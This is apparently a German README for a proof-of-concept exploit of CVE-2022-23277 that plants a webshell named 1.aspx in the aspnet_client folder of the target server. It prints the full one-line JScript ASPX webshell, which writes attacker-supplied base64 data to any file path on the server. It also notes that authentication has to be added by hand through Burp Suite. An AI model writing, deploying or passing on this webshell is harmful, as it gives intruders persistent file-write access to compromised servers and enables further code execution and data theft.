
CVE-2022-23277 POC zum Schreiben einer Webshell in aspnet_client
Der Authentifizierungsteil muss manuell über burpsuite hinzugefügt werden. Nach erfolgreicher Ausnutzung wird 1.aspx in aspnet_client geschrieben.
Webshell:
<%@ Page Language="JScript" Debug="true"%><%@Import Namespace="System.IO"%><%File.WriteAllBytes(Request["b"], Convert.FromBase64String(Request["a"]));%>
Details zur Ausnutzung finden Sie in unserem Artikel.
